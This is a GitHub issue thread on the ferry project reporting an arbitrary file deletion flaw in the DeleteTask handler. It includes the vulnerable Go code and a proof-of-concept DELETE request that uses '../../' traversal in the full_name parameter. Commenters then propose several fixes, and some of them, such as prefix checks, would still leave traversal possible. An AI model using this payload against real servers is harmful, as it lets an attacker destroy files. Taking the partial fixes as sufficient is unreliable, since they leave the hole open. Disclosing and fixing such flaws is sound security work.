### ISSUE TITLE
Arbitrary File Deletion vulnerability in apis/process/task.go

### ISSUE THREAD

**Issue by yuxianzi** [lanyulei/ferry#240]
## Vulnerability conditions
- Website background permissions
## Vulnerability details
Location: https://github.com/lanyulei/ferry/blob/master/apis/process/task.go#L199

Code: 
```
func DeleteTask(c *gin.Context) {
	fullName := c.DefaultQuery("full_name", "")
	if fullName == "" {
		app.Error(c, -1, errors.New("参数不正确，请确定参数full_name是否传递"), "")
		return
	}

	err := os.Remove(fmt.Sprintf("%v/%v", viper.GetString("script.path"), fullName))
	if err != nil {
		app.Error(c, -1, err, fmt.Sprintf("删除文件失败，%v", err.Error()))
		return
	}

	app.OK(c, nil, "任务删除成功")
}
```

The program first obtains the value passed in full_name and assigns it to the fullName variable. Because there is no filtering `.` and `/` directly passes the fullName variable to the os.Remove method, which leads to arbitrary file deletion vulnerabilities

### Step 1 Get an existing file
`/static/uploadfile/images/a5058e2820684bf282d4b3206c31446a-1597815294-ferry_logo_white.png`
![image](https://user-images.githubusercontent.com/41229220/145231637-63419e03-a755-43a5-9175-8dd0ee317a86.png)

### Step 2 Try to delete the file obtained in step1

Construct malicious request packet
```
DELETE /api/v1/task?full_name=../../static/uploadfile/images/a5058e2820684bf282d4b3206c31446a-1597815294-ferry_logo_white.png HTTP/1.1
Host: 
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2MzkwNTY1OTQsImlkZW50aXR5IjoxLCJuaWNlIjoiYWRtaW4iLCJvcmlnX2lhdCI6MTYzODk3MDE5NCwicm9sZWlkIjoxLCJyb2xla2V5IjoiYWRtaW4iLCJyb2xlbmFtZSI6Iuezu-e7n-euoeeQhuWRmCJ9.VIyebiFZEmtNCSuJkiujRz9OYrjL_lzeNrGbMMMfVpQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4495.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
```
![image](https://user-images.githubusercontent.com/41229220/145232756-ed5207c8-5c9a-463d-b368-b0b34aac0653.png)

`/static/uploadfile/images/a5058e2820684bf282d4b3206c31446a-1597815294-ferry_logo_white.png` file uploaded successfully

![image](https://user-images.githubusercontent.com/41229220/145233205-e8240de6-165b-45bb-b46e-02d0aa93cbc4.png)

**Comment by liouxiao** [comment]
How about

`
func DeleteTask(c *gin.Context) {
	fullName := c.DefaultQuery("full_name", "")
	if fullName == "" || strings.Contains(fullName, "/") {
		app.Error(c, -1, errors.New("参数不正确，请确定参数full_name是否传递"), "")
		return
	}

	err := os.Remove(fmt.Sprintf("%v/%v", viper.GetString("script.path"), fullName))
	if err != nil {
		app.Error(c, -1, err, fmt.Sprintf("删除文件失败，%v", err.Error()))
		return
	}

	app.OK(c, nil, "任务删除成功")
}
`

**Comment by yuxianzi** [comment]
> 
```
if fullName == "" || strings.HasPrefix(fileName, ".") || strings.HasPrefix(fileName, "/") || strings.HasPrefix(fileName, "\\")
```
It might be better, what do you think,Refer to apis/process/task.go func TaskDetails

**Comment by liouxiao** [comment]
> /

Will it run on Windows? How if fullName = "C:\\abc.txt" ?

**Comment by yuxianzi** [comment]
> 

可以考虑限制文件删除函数可删除的目录位置和文件类型,例如
```
	var Path string = "upload/"
	var fullName string = "../1.txt"
	if fullName == "" || strings.HasPrefix(fullName, ".") || strings.HasPrefix(fullName, "/") || strings.HasPrefix(fullName, "\\"){
	fmt.Print("参数错误")
	}
	os.Remove(Path + fullName)
```
